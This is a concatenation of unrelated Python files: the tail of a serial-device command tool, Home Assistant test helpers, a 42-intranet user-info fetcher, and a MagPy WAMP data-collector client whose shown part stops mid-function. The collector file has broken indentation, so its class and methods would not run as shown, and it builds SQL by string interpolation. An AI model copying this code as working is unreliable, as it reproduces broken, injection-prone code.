            msgs = ser.send_wait(cmd, timeout=timeout, msg_type=cmd.RESPONSE_TYPE, attempts=attempts)
        except TimeoutError:
            # Timeout error with no response for the expected type.
            # Fall back to whatever unmatched messages were collected.
            with ser.ack_lock:
                msgs = [ser.ack_list.pop(0) for _ in range(len(ser.ack_list))]
    # Pretty-print every received message and its fields.
    for msg in msgs:
        print('Received {}:'.format(msg.NAME))
        for field, value in msg.fields().items():
            print('\t{} = {}'.format(field, value))
        print()


# Script entry-point alias used by the __main__ block below.
main = send_msg
def cli_to_kwargs(cli_args):
    """Convert a flat list of command line tokens to a kwargs dictionary.

    Args:
        cli_args (list): Alternating name/value tokens, e.g.
            ["--address", "1", "--value", "2"].
    """
    kwargs = {}
    for i in range(0, len(cli_args), 2):
        kwargs[get_name(cli_args[i])] = get_value(cli_args[i + 1])
    return kwargs
def get_name(name):
    """Return the CLI argument name with every '-' character stripped."""
    return ''.join(ch for ch in str(name) if ch != '-')
def get_value(value):
    """Convert the given string value to a proper python object.

    Hex literals like "0x12" become ints (18); otherwise an int, then a
    float conversion is attempted; on failure the value is returned
    unchanged.  ast.literal_eval may work better.
    """
    text = str(value)
    try:
        if text.startswith('0x'):
            # Was given hex. This allows "0x12" = 18
            return int(value, 16)
        return int(value)
    except Exception:
        pass
    try:
        return float(value)
    except Exception:
        return value
if __name__ == '__main__':
    import argparse

    P = argparse.ArgumentParser(description='Send a command to the device.')
    P.add_argument('com', type=str, help='Com port to connect to.')
    P.add_argument('baudrate', type=int, help='Baudrate to connect with.')
    P.add_argument('cmd_id', type=str,
                   help='Command ID as the string NAME or integer ID '
                        '(Example: "Command Status" String, 0x12 Hex, or 18 Dec).')
    P.add_argument('--timeout', type=float, default=1, help='Timeout to wait for the response.')
    P.add_argument('--attempts', type=int, default=1, help='Number of times to send the message expecting a response.')
    # Unknown arguments become Command keyword arguments (e.g. --address 1).
    ARGS, REMAINDER = P.parse_known_args()
    main(ARGS.com, ARGS.baudrate, get_value(ARGS.cmd_id), timeout=ARGS.timeout, attempts=ARGS.attempts,
         **cli_to_kwargs(REMAINDER))
|
common.py | """Test the helper method for writing tests."""
import asyncio
import os
import sys
from datetime import timedelta
from unittest.mock import patch, MagicMock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from aiohttp import web
from homeassistant import core as ha, loader
from homeassistant.setup import setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers.dispatcher import async_dispatcher_send
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.helpers.restore_state import DATA_RESTORE_CACHE
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import sun, mqtt, recorder
from homeassistant.components.http.auth import auth_middleware
from homeassistant.components.http.const import (
KEY_USE_X_FORWARDED_FOR, KEY_BANS_ENABLED, KEY_TRUSTED_NETWORKS)
from homeassistant.util.async import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INST_COUNT = 0
def get_test_config_dir(*add_path):
    """Return a path to a test config dir, plus optional sub-paths."""
    base = os.path.dirname(__file__)
    return os.path.join(base, 'testing_config', *add_path)
def get_test_home_assistant():
    """Return a Home Assistant object pointing at test config directory.

    The event loop runs on a dedicated daemonless thread; hass.start and
    hass.stop are patched so tests can drive the instance synchronously.
    """
    if sys.platform == "win32":
        loop = asyncio.ProactorEventLoop()
    else:
        loop = asyncio.new_event_loop()

    hass = loop.run_until_complete(async_test_home_assistant(loop))

    stop_event = threading.Event()

    def run_loop():
        """Run event loop."""
        # pylint: disable=protected-access
        loop._thread_ident = threading.get_ident()
        loop.run_forever()
        # Signal stop_hass() that the loop has fully shut down.
        stop_event.set()

    orig_stop = hass.stop

    def start_hass(*mocks):
        """Helper to start hass."""
        run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()

    def stop_hass():
        """Stop hass."""
        orig_stop()
        # Wait for the loop thread to finish before closing the loop.
        stop_event.wait()
        loop.close()

    hass.start = start_hass
    hass.stop = stop_hass

    threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()

    return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
    """Return a Home Assistant object pointing at test config dir.

    Sets deterministic test configuration (location, units, timezone),
    neutralizes MagicMock jobs, and patches async_start so the internal
    timer is never created during tests.
    """
    global INST_COUNT
    INST_COUNT += 1
    loop._thread_ident = threading.get_ident()

    hass = ha.HomeAssistant(loop)

    orig_async_add_job = hass.async_add_job

    def async_add_job(target, *args):
        """Add a magic mock."""
        # Swallow MagicMock jobs: the executor would otherwise treat them
        # as coroutines and raise.
        if isinstance(target, MagicMock):
            return
        return orig_async_add_job(target, *args)

    hass.async_add_job = async_add_job

    hass.config.location_name = 'test home'
    hass.config.config_dir = get_test_config_dir()
    hass.config.latitude = 32.87336
    hass.config.longitude = -117.22743
    hass.config.elevation = 0
    hass.config.time_zone = date_util.get_time_zone('US/Pacific')
    hass.config.units = METRIC_SYSTEM
    hass.config.skip_pip = True

    if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS:
        yield from loop.run_in_executor(None, loader.prepare, hass)

    hass.state = ha.CoreState.running

    # Mock async_start
    orig_start = hass.async_start

    @asyncio.coroutine
    def mock_async_start():
        """Start the mocking."""
        # 1. We only mock time during tests
        # 2. We want block_till_done that is called inside stop_track_tasks
        with patch('homeassistant.core._async_create_timer'), \
                patch.object(hass, 'async_stop_track_tasks'):
            yield from orig_start()

    hass.async_start = mock_async_start

    @ha.callback
    def clear_instance(event):
        """Clear global instance."""
        global INST_COUNT
        INST_COUNT -= 1

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)

    return hass
def get_test_instance_port():
    """Return unused port for running test instance.

    The socket that holds the default port does not get released when we stop
    HA in a different test case. Until I have figured out what is going on,
    let's run each test on a different port.
    """
    global _TEST_INSTANCE_PORT
    # Monotonically increasing module-level counter starting at SERVER_PORT.
    _TEST_INSTANCE_PORT += 1
    return _TEST_INSTANCE_PORT
def mock_service(hass, domain, service):
    """Setup a fake service & return a list that logs calls to this service."""
    calls = []

    @asyncio.coroutine
    def mock_service_log(call):  # pylint: disable=unnecessary-lambda
        """Mocked service call."""
        calls.append(call)

    # Register thread-safely: use the async API only when already running
    # on the event loop's own thread.
    if hass.loop.__dict__.get("_thread_ident", 0) == threading.get_ident():
        hass.services.async_register(domain, service, mock_service_log)
    else:
        hass.services.register(domain, service, mock_service_log)

    return calls
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0):
    """Fire the MQTT message.  Must be called from the event loop."""
    async_dispatcher_send(
        hass, mqtt.SIGNAL_MQTT_MESSAGE_RECEIVED, topic, payload, qos)
def fire_mqtt_message(hass, topic, payload, qos=0):
    """Fire the MQTT message.  Thread-safe wrapper for the async version."""
    run_callback_threadsafe(
        hass.loop, async_fire_mqtt_message, hass, topic, payload, qos).result()
def fire_time_changed(hass, time):
    """Fire an EVENT_TIME_CHANGED event carrying *time* as 'now'."""
    payload = {'now': time}
    hass.bus.fire(EVENT_TIME_CHANGED, payload)
def fire_service_discovered(hass, service, info):
    """Fire an EVENT_PLATFORM_DISCOVERED event for *service* with *info*."""
    payload = {
        ATTR_SERVICE: service,
        ATTR_DISCOVERED: info,
    }
    hass.bus.fire(EVENT_PLATFORM_DISCOVERED, payload)
def ensure_sun_risen(hass):
    """Trigger sun to rise if below horizon."""
    if sun.is_on(hass):
        return
    # Jump time just past the next sunrise so the sun component updates.
    fire_time_changed(hass, sun.next_rising_utc(hass) + timedelta(seconds=10))
def ensure_sun_set(hass):
    """Trigger sun to set if above horizon."""
    if not sun.is_on(hass):
        return
    # Jump time just past the next sunset so the sun component updates.
    fire_time_changed(hass, sun.next_setting_utc(hass) + timedelta(seconds=10))
def load_fixture(filename):
    """Return the contents of *filename* from the fixtures directory."""
    fixtures_dir = os.path.join(os.path.dirname(__file__), 'fixtures')
    with open(os.path.join(fixtures_dir, filename)) as fptr:
        return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
    """Fire a mocked state changed event on the bus."""
    event_data = {
        'entity_id': new_state.entity_id,
        'new_state': new_state,
    }
    # old_state is attached only when one was supplied.
    if old_state:
        event_data['old_state'] = old_state
    hass.bus.fire(EVENT_STATE_CHANGED, event_data)
def mock_http_component(hass, api_password=None):
    """Mock the HTTP component.

    Registered views are recorded by name in hass.http.views so tests
    can assert on them.
    """
    hass.http = MagicMock(api_password=api_password)
    mock_component(hass, 'http')
    hass.http.views = {}

    def mock_register_view(view):
        """Store registered view."""
        if isinstance(view, type):
            # Instantiate the view, if needed
            view = view()
        hass.http.views[view.name] = view

    hass.http.register_view = mock_register_view
def mock_http_component_app(hass, api_password=None):
    """Create an aiohttp.web.Application instance for testing."""
    if 'http' not in hass.config.components:
        mock_http_component(hass, api_password)
    # Real auth middleware, but with bans and trusted networks disabled.
    app = web.Application(middlewares=[auth_middleware], loop=hass.loop)
    app['hass'] = hass
    app[KEY_USE_X_FORWARDED_FOR] = False
    app[KEY_BANS_ENABLED] = False
    app[KEY_TRUSTED_NETWORKS] = []
    return app
def mock_mqtt_component(hass):
    """Mock the MQTT component.

    Returns the MQTT MagicMock so tests can assert on published messages.
    """
    with patch('homeassistant.components.mqtt.MQTT') as mock_mqtt:
        # Pretend the broker connection succeeded.
        mock_mqtt().async_connect.return_value = mock_coro(True)
        setup_component(hass, mqtt.DOMAIN, {
            mqtt.DOMAIN: {
                mqtt.CONF_BROKER: 'mock-broker',
            }
        })
        return mock_mqtt
def mock_component(hass, component):
    """Mock a component is setup.

    Args:
        hass: Home Assistant test instance.
        component (str): Component/domain name to register as set up.

    Raises:
        AssertionError: If the component was already set up.
    """
    if component in hass.config.components:
        # Bug fix: the AssertionError was previously constructed but never
        # raised, so duplicate setups were silently ignored.
        raise AssertionError("Component {} is already setup".format(component))

    hass.config.components.add(component)
class MockModule(object):
    """Representation of a fake module."""

    # pylint: disable=invalid-name
    def __init__(self, domain=None, dependencies=None, setup=None,
                 requirements=None, config_schema=None, platform_schema=None,
                 async_setup=None):
        """Initialize the mock module.

        Args:
            domain (str)[None]: Component domain name.
            dependencies (list)[None]: Component dependencies.
            setup (callable)[None]: Delegate invoked by setup().
            requirements (list)[None]: pip requirements.
            config_schema: Optional CONFIG_SCHEMA; only set when given so
                absence is detectable via hasattr.
            platform_schema: Optional PLATFORM_SCHEMA; same behavior.
            async_setup (coroutine)[None]: When given, shadows the sync
                setup path.
        """
        self.DOMAIN = domain
        self.DEPENDENCIES = dependencies or []
        self.REQUIREMENTS = requirements or []
        self._setup = setup

        if config_schema is not None:
            self.CONFIG_SCHEMA = config_schema

        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema

        if async_setup is not None:
            self.async_setup = async_setup

    def setup(self, hass, config):
        """Setup the component.

        We always define this mock because MagicMock setups will be seen by the
        executor as a coroutine, raising an exception.
        """
        if self._setup is not None:
            return self._setup(hass, config)
        return True
class MockPlatform(object):
    """Provide a fake platform."""

    # pylint: disable=invalid-name
    def __init__(self, setup_platform=None, dependencies=None,
                 platform_schema=None):
        """Initialize the platform.

        Args:
            setup_platform (callable)[None]: Delegate invoked by
                setup_platform() when provided.
            dependencies (list)[None]: Platform dependencies.
            platform_schema: Optional PLATFORM_SCHEMA; only set when given.
        """
        self.DEPENDENCIES = dependencies or []
        self._setup_platform = setup_platform
        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema

    def setup_platform(self, hass, config, add_devices, discovery_info=None):
        """Set up the platform by delegating to the configured callable."""
        if self._setup_platform is None:
            return
        self._setup_platform(hass, config, add_devices, discovery_info)
class MockToggleDevice(ToggleEntity):
    """Provide a mock toggle device.

    Every property access and service call is appended to self.calls as
    (method_name, kwargs) so tests can assert on usage.
    """

    def __init__(self, name, state):
        """Initialize the mock device."""
        self._name = name or DEVICE_DEFAULT_NAME
        self._state = state
        self.calls = []

    @property
    def name(self):
        """Return the name of the device if any."""
        self.calls.append(('name', {}))
        return self._name

    @property
    def state(self):
        """Return the state of the device if any."""
        self.calls.append(('state', {}))
        return self._state

    @property
    def is_on(self):
        """Return true if device is on."""
        self.calls.append(('is_on', {}))
        return self._state == STATE_ON

    def turn_on(self, **kwargs):
        """Turn the device on."""
        self.calls.append(('turn_on', kwargs))
        self._state = STATE_ON

    def turn_off(self, **kwargs):
        """Turn the device off."""
        self.calls.append(('turn_off', kwargs))
        self._state = STATE_OFF

    def last_call(self, method=None):
        """Return the last recorded call, optionally filtered by method name."""
        if not self.calls:
            return None
        elif method is None:
            return self.calls[-1]
        else:
            try:
                # Search newest-first for the most recent matching call.
                return next(call for call in reversed(self.calls)
                            if call[0] == method)
            except StopIteration:
                return None
def patch_yaml_files(files_dict, endswith=True):
    """Patch load_yaml with a dictionary of yaml files.

    Args:
        files_dict (dict): Maps file names to yaml content strings.
        endswith (bool)[True]: Also match when a requested path merely
            ends with one of the keys.

    Returns:
        A patcher replacing yaml's open() with one serving files_dict.
    """
    # match using endswith, start search with longest string
    # NOTE(review): sorted(key=len) is ascending, so the *shortest* key is
    # tried first, contradicting the comment above - confirm intent.
    matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []

    def mock_open_f(fname, **_):
        """Mock open() in the yaml module, used by load_yaml."""
        # Return the mocked file on full match
        if fname in files_dict:
            _LOGGER.debug('patch_yaml_files match %s', fname)
            res = StringIO(files_dict[fname])
            setattr(res, 'name', fname)
            return res

        # Match using endswith
        for ends in matchlist:
            if fname.endswith(ends):
                _LOGGER.debug('patch_yaml_files end match %s: %s', ends, fname)
                res = StringIO(files_dict[ends])
                setattr(res, 'name', fname)
                return res

        # Fallback for hass.components (i.e. services.yaml)
        if 'homeassistant/components' in fname:
            _LOGGER.debug('patch_yaml_files using real file: %s', fname)
            return open(fname, encoding='utf-8')

        # Not found
        raise FileNotFoundError('File not found: {}'.format(fname))

    return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
    """Helper method to return a coro that returns a value.

    Note: returns the coroutine *object* (already called), ready to be
    awaited / yielded from exactly once.
    """
    @asyncio.coroutine
    def coro():
        """Fake coroutine."""
        return return_value

    return coro()
def mock_coro_func(return_value=None):
    """Helper method to return a coro function that returns a value.

    Unlike mock_coro this returns the *function* (accepting any args),
    so it can be called multiple times.
    """
    @asyncio.coroutine
    def coro(*args, **kwargs):
        """Fake coroutine."""
        return return_value

    return coro
@contextmanager
def assert_setup_component(count, domain=None):
    """Collect valid configuration from setup_component.

    - count: The amount of valid platforms that should be setup
    - domain: The domain to count is optional. It can be automatically
      determined most of the time

    Use as a context manager aroung setup.setup_component
        with assert_setup_component(0) as result_config:
            setup_component(hass, domain, start_config)
            # using result_config is optional
    """
    config = {}

    @ha.callback
    def mock_psc(hass, config_input, domain):
        """Mock the prepare_setup_component to capture config."""
        # Delegate to the real validator, but record the validated
        # (or None on failure) config per domain.
        res = async_process_component_config(
            hass, config_input, domain)
        config[domain] = None if res is None else res.get(domain)
        _LOGGER.debug('Configuration for %s, Validated: %s, Original %s',
                      domain, config[domain], config_input.get(domain))
        return res

    assert isinstance(config, dict)
    with patch('homeassistant.config.async_process_component_config',
               mock_psc):
        yield config

    if domain is None:
        # Exactly one domain must have been captured to infer it.
        assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
                                  .format(list(config.keys())))
        domain = list(config.keys())[0]

    res = config.get(domain)
    res_len = 0 if res is None else len(res)
    assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
        .format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
    """Initialize the recorder with an in-memory SQLite database."""
    config = dict(add_config) if add_config else {}
    config[recorder.CONF_DB_URL] = 'sqlite://'  # In memory DB

    # Schema migration is skipped; the in-memory DB starts fresh anyway.
    with patch('homeassistant.components.recorder.migration.migrate_schema'):
        assert setup_component(hass, recorder.DOMAIN,
                               {recorder.DOMAIN: config})
        assert recorder.DOMAIN in hass.config.components
    _LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
    """Mock the DATA_RESTORE_CACHE."""
    hass.data[DATA_RESTORE_CACHE] = {
        state.entity_id: state for state in states}
    _LOGGER.debug('Restore cache: %s', hass.data[DATA_RESTORE_CACHE])
    # The dict is keyed by entity_id, so a length mismatch means the
    # caller passed duplicate entity ids.
    assert len(hass.data[DATA_RESTORE_CACHE]) == len(states), \
        "Duplicate entity_id? {}".format(states)
    # restore_state only restores while HA is in the starting state.
    hass.state = ha.CoreState.starting
    mock_component(hass, recorder.DOMAIN)
|
get_user_info.py | import requests
import json
import urllib2
import urllib
import pandas as pd
from threading import Thread
if __name__ == '__main__':
    # Read application credentials (uid and secret, one per line).
    with open('appcreds.txt', 'r') as credfile:
        uid, secret = credfile.read().splitlines()
    # OAuth2 client-credentials flow against the 42 intranet API.
    r = requests.post("https://api.intra.42.fr/oauth/token", data={'grant_type': 'client_credentials', 'client_id': uid, 'client_secret': secret})
    r.raise_for_status()
    access_token = json.loads(r.text)['access_token']
    print(access_token)
    df = pd.read_csv('users_url.csv')
    people = []

    # Threading worker: fetch one user's info and append it to 'people'.
    # list.append is atomic under the GIL, so no lock is needed here.
    def record_info(user_url):
        # python3 implementation
        # f = urllib.request.urlopen(user_url+('?access_token=%s' % (access_token)))
        # python2 implementation
        f = urllib2.urlopen(user_url+('?access_token=%s' % (access_token)))
        people.append(json.loads(f.read()))

    # Fetch in req_slower sequential batches so we do not flood the API.
    req_slower = 20
    length = len(df)
    for count in range(req_slower):
        threads = []
        print("Recording: %d%%" % int(count * 100 / req_slower))
        # Multi-threading to speed up user info gathering within a batch.
        # Bug fix: removed the stray 'count += 1' that pointlessly mutated
        # the outer batch counter inside this loop.
        for i in range((length * count) // req_slower, (length * (count + 1)) // req_slower):
            process = Thread(target=record_info, args=[df['url'][i]])
            process.start()
            threads.append(process)
        # Join before starting the next batch so batches never overlap.
        for process in threads:
            process.join()
    print("Recording completed")
    # output as json
    with open('users_info.txt', 'w') as outfile:
        json.dump(people, outfile)
    # output as DataFrame
    # df = pd.DataFrame(pd.read_json(json.dumps(people)))
    # df.to_csv('users_info.csv')
    # print(pd.read_csv('users_info.csv'))
|
subscribe2client.py | from __future__ import print_function
import sys, os, struct
from twisted.python import log
try: # version > 0.8.0
from autobahn.wamp1.protocol import WampClientProtocol
except:
from autobahn.wamp import WampClientProtocol
# For converting Unicode text
import collections
# For saving
import numpy as np
import multiprocessing
# Timing
from datetime import datetime, timedelta
# Database
#import MySQLdb
# sets for removing duplicates
#TODO
"""
Some comments:
- storage of one input line requires about 400 microseconds
TODO:
secondary time column in POS1 file was added manually to data base - not available in bin file - please check that
"""
import magpy.stream as st
from magpy.database import *
from magpy.opt import cred as mpcred
from magpy.transfer import scptransfer
clientname = 'default'
s = []            # sensor list (populated by sendparameter)
o = []            # one-wire sensor list (populated by sendparameter)
marcospath = ''

# Maps numeric field ids from the wire protocol to MagPy column keys.
IDDICT = {0:'clientname',1:'time',2:'date',3:'time',4:'time',5:'coord',
          10:'f',11:'x',12:'y',13:'z',14:'df',
          20:'x',21:'y',22:'z',23:'dx',24:'dy',25:'dz',
          30:'t1',31:'t1',32:'t2',33:'var1',34:'t2',35:'var3',36:'x',37:'y',38:'var1',39:'f',
          40:'var1',45:'str1',
          50:'var1',51:'var2',
          60:'var2',61:'var3',62:'var4'}

# Per-module field id lists, units, and column names (keep keys aligned).
MODIDDICT = {'env': [1,30,33,34], 'ow': [1,30,33,60,61,62], 'lemi': [1,4,11,12,13,31,32,60] ,'pos1': [1,4,10,14,40], 'cs': [1,10], 'gsm': [1,10], 'kern': [1,38], 'ult': [1,32,50,51], 'lnm': [1,30,36,37,39,45], 'pal': [1,11,12,13], 'ard': [1,10,11,12,13,14,30,33,35], 'sug': [1,20,21,22,23,24,25], 'bm3': [1,35]}
# Bug fix: UNITDICT contained a duplicate 'cs' key (the second entry
# silently overwrote the first); it was meant to be 'gsm', mirroring
# MODIDDICT and NAMEDICT.
UNITDICT = {'env': ['degC','percent','degC'], 'ow': ['degC','percent','V','V','V'], 'lemi': ['nT','nT','nT','degC','degC','V'] ,'pos1': ['nT','nT','index'], 'cs': ['nT'], 'gsm': ['nT'], 'kern': ['g'], 'ult': ['degC','m_s','deg'], 'lnm': ['degC','mm','m','N'], 'ard': ['nT','nT','nT','nT','-','degC','percent','HPa'], 'sug': ['nT','nT','nT','-','-','-'], 'bm3': ['mBar']}
NAMEDICT = {'env': ['T','rh','Dewpoint'], 'ow': ['T','rh','VDD','VAD','VIS'], 'lemi': ['x','y','z','Ts','Te','Vol'] ,'pos1': ['f','df','errorcode'], 'cs': ['f'], 'gsm': ['f'], 'kern': ['w'], 'ult': ['T','v','Dir'], 'lnm': ['T','R','visibility','Ptotal'], 'ard': ['f','x','y','z','df','T','rh','P'],'sug': ['S1','S2','S3','Grad_S3_S1','Grad_S3_S2','Grad_S2_S1'], 'bm3': ['P']}
def sendparameter(cname,cip,marcospath,op,sid,sshc,sensorlist,owlist,pd,dbc=None):
    """Store the collector's runtime parameters in module-level globals.

    Must be called before the WAMP client starts; PubSubClient reads
    these globals in onSessionOpen.
    """
    print("Getting parameters ...")
    global clientname
    clientname = cname
    global clientip
    clientip = cip
    global output # desired storage type - "file" or "db"
    output = op
    global stationid # Station code
    stationid = sid
    global sshcred # List containing credentials for scp transfer
    sshcred = sshc
    global o # List containing one wire information and ids
    o = owlist
    global s # List containing sensor information and ports
    s = sensorlist
    global destpath # String for storing data - used for getting new sensor data for db upload and for file saving
    destpath = marcospath
    global printdata # BOOL for testing purpose - prints received data to screen
    printdata = pd
    if output == 'db':
        if not dbc:
            # NOTE(review): this only prints; dbcred is then set to None
            # and the DB connect in onSessionOpen will fail later.
            print ('collectors owclient: for db output you need to provide the credentials as last option')
        global dbcred
        dbcred = dbc
    print("Parameters transfered")
    return
def timeToArray(timestring):
    """Convert a time string to a list of integer components.

    Expects a space-separated date/time like '2013-12-12 23:12:23.122324'
    and returns [year, month, day, hour, minute, second, microsecond].
    Returns an empty list when the string cannot be parsed.
    """
    try:
        splittedfull = timestring.split(' ')
        splittedday = splittedfull[0].split('-')
        splittedsec = splittedfull[1].split('.')
        splittedtime = splittedsec[0].split(':')
        datearray = splittedday + splittedtime
        datearray.append(splittedsec[1])
        # Bug fix: wrap map() in list() - on Python 3 map() returns an
        # iterator, which callers cannot index or compare to a list.
        datearray = list(map(int,datearray))
        return datearray
    except Exception:
        # Narrowed from a bare except so KeyboardInterrupt still works.
        print('collectors owclient: Error while extracting time array')
        return []
def dataToFile(outputdir, sensorid, filedate, bindata, header):
    """Append one binary data line to <outputdir>/<sensorid>/<sensorid>_<filedate>.bin.

    The header line is only written when the file is first created.
    NOTE(review): the file is opened in 'wb' but str data is written and
    appends use text mode 'a' - this mixing only works on Python 2;
    confirm before porting to Python 3.
    """
    # File Operations
    try:
        path = os.path.join(outputdir,sensorid)
        # outputdir defined in main options class
        if not os.path.exists(path):
            os.makedirs(path)
        savefile = os.path.join(path, sensorid+'_'+filedate+".bin")
        if not os.path.isfile(savefile):
            with open(savefile, "wb") as myfile:
                myfile.write(header + "\n")
                myfile.write(bindata + "\n")
        else:
            with open(savefile, "a") as myfile:
                myfile.write(bindata + "\n")
    except:
        print('collectors owclient: Error while saving file')
class PubSubClient(WampClientProtocol):
"""
Class for OneWire communication
"""
    def onSessionOpen(self):
        """WAMP session opened: initialize state, optionally connect to the
        database, and start a subscription for every configured module."""
        print("Starting")
        global clientname
        global clientip
        global o
        global s
        global destpath
        global printdata
        global bufferarray
        global output
        global module
        global stationid
        global dbcred
        global sshcred
        print("Starting " + clientname + " session")
        # TODO Make all the necessary parameters variable
        # Basic definitions to change
        self.stationid = stationid
        self.output = output
        self.sensorid = ''
        self.sensortype = ''
        self.sensorgroup = ''
        self.bufferarray = []
        self.savedirectly = True
        self.module = ''
        self.typ = ''
        self.count = 0
        #self.mpjobs = [] # multiprocessing jobs
        #self.output = output # can be either 'db' or 'file', if not db, then file is used
        # Open database connection
        self.db = None
        self.cursor = None
        if not output == 'file':
            print("collectors client: Connecting to DB ...")
            # NOTE(review): 'mysql' comes from the star import of
            # magpy.database; dbcred is [host, user, passwd, db].
            self.db = mysql.connect(dbcred[0],dbcred[1],dbcred[2],dbcred[3] )
            # prepare a cursor object using cursor() method
            self.cursor = self.db.cursor()
            print("collectors client: ... DB successfully connected ")
        # Initiate subscriptions
        self.line = []
        for row in s:
            module = row[0]
            print("collectors client: Starting subscription for %s" % module)
            self.subscribeInst(self.db, self.cursor, clientname, module, output)
def subscribeOw(self, client, output, module, owlist):
"""
Subscribing to all Onewire Instruments
"""
self.prefix(module, "http://example.com/" + client +"/"+module+"#")
if output == 'db':
# -------------------------------------------------------
# A. Create database input
# -------------------------------------------------------
# ideal way: upload an already existing file from moon for each sensor
# check client for existing file:
for row in owlist:
subs = True
print("collectors owclient: Running for sensor", row[0])
# Try to find sensor in db:
sql = "SELECT SensorID FROM SENSORS WHERE SensorID LIKE '%s%%'" % row[0]
try:
# Execute the SQL command
self.cursor.execute(sql)
except:
print("collectors owclient: Unable to execute SENSOR sql")
try:
# Fetch all the rows in a list of lists.
results = self.cursor.fetchall()
except:
print("collectors owclient: Unable to fetch SENSOR data from DB")
results = []
# checking existing data table
try:
self.cursor.execute("SHOW TABLES LIKE '{}%'".format(sensorid))
secresults = self.cursor.fetchall()
except:
secresults = []
if len(results) < 1 and len(secresults) < 1:
# Initialize e.g. ow table
print("collectors owclient: No sensors registered so far ...")
if len(secresults) < 1:
# Initialize e.g. ow table
print("collectors owclient: No data table existing so far - Getting file from moon and uploading it")
day = datetime.strftime(datetime.utcnow(),'%Y-%m-%d')
destfile = os.path.join(destpath,'MartasFiles', row[0]+'_'+day+'.bin')
datafile = os.path.join('/srv/ws/', clientname, row[0], row[0]+'_'+day+'.bin')
try:
print("collectors owclient: Downloading data: %s" % datafile)
scptransfer(sshcred[0]+'@'+clientip+':'+datafile,destfile,sshcred[1])
stream = st.read(destfile)
print("collectors owclient: Reading with MagPy... Found: {} datapoints".format(stream.length()[0]))
stream.header['StationID'] = self.stationid
stream.header['SensorModule'] = 'OW'
stream.header['SensorType'] = row[1]
if not row[2] == 'typus':
stream.header['SensorGroup'] = row[2]
if not row[3] == 'location':
stream.header['DataLocationReference'] = row[3]
if not row[4] == 'info':
stream.header['SensorDescription'] = row[4]
if not len(stream.ndarray[0]) > 0:
stream = stream.linestruct2ndarray()
stream2db(self.db,stream)
print("collectors owclient: Stream uploaded successfully")
except:
print("collectors owclient: Could not upload data to the data base - subscription to %s failed" % row[0])
subs = False
else:
print("collectors owclient: Found sensor(s) in DB - subscribing to the highest revision number")
if subs:
subscriptionstring = "%s:%s-value" % (module, row[0])
print("collectors owclient: Subscribing (directing to DB): ", subscriptionstring)
self.subscribe(subscriptionstring, self.onEvent)
elif output == 'file':
for row in o:
print("collectors owclient: Running for sensor", row[0])
subscriptionstring = "%s:%s-value" % (module, row[0])
print("collectors owclient: Subscribing (directing to file): ", subscriptionstring)
self.subscribe(subscriptionstring, self.onEvent)
def subscribeSensor(self,client,output,module,sensorshort,sensorid):
    """
    Subscribing to Sensors:
    principally any subscription is possible if the subscription string is supported by the moons protocols

    Registers the WAMP URI prefix for ``module``, and — for database output —
    bootstraps the sensor on the DB side if it is unknown (by scp-copying
    today's buffer file from the MARTAS client and uploading it with MagPy),
    then subscribes :meth:`onEvent` to the sensor's value topic.

    Parameters:
        client      : (str) client (MARTAS) name, used in the prefix URI
        output      : (str) 'db' writes incoming data to MySQL, 'file' to flat files
        module      : (str) protocol/module key (e.g. 'lemi', 'pos1')
        sensorshort : (str) three-letter sensor family code (e.g. 'LEM')
        sensorid    : (str) full sensor id; the last four characters are
                      assumed to be the revision number

    NOTE(review): relies on several module-level globals defined elsewhere in
    this file (destpath, clientname, clientip, sshcred, st, stream2db,
    scptransfer, o) — confirm availability in the deployed module.
    """
    # Register the WAMP URI prefix so short "module:topic" strings work below.
    self.prefix(module, "http://example.com/" + client +"/"+module+"#")
    if output == 'db':
        # -------------------------------------------------------
        # 1. Get available Sensors - read sensors.txt
        # -------------------------------------------------------
        # Try to find sensor in db:
        # NOTE(review): SQL is built by string interpolation; sensorid is
        # expected to come from trusted local configuration.
        sql = "SELECT SensorID FROM SENSORS WHERE SensorID LIKE '%s%%'" % sensorid
        try:
            # Execute the SQL command
            self.cursor.execute(sql)
        except:
            print("collectors client: Unable to execute SENSOR sql")
        try:
            # Fetch all the rows in a list of lists.
            results = self.cursor.fetchall()
        except:
            print("collectors client: Unable to fetch SENSOR data from DB")
            results = []
        # checking existing data table
        try:
            self.cursor.execute("SHOW TABLES LIKE '{}%'".format(sensorid))
            secresults = self.cursor.fetchall()
        except:
            secresults = []
        if len(results) < 1 and len(secresults) < 1:
            # Initialize e.g. ow table
            print("collectors client: No sensors registered so far ...")
        if len(secresults) < 1:
            # if not present then get a file and upload it
            print("collectors client: No sensors registered so far - Getting data file from martas and uploading it using writeDB")
            day = datetime.strftime(datetime.utcnow(),'%Y-%m-%d')
            # Try both the binary and the ascii buffer file for today.
            for exten in ['bin','asc']:
                destfile = os.path.join(destpath,'MartasFiles', sensorid+'_'+day+'.'+exten)
                datafile = os.path.join('/srv/ws/', clientname, sensorid, sensorid+'_'+day+'.'+exten)
                print("collectors client: Downloading data: {}".format(datafile))
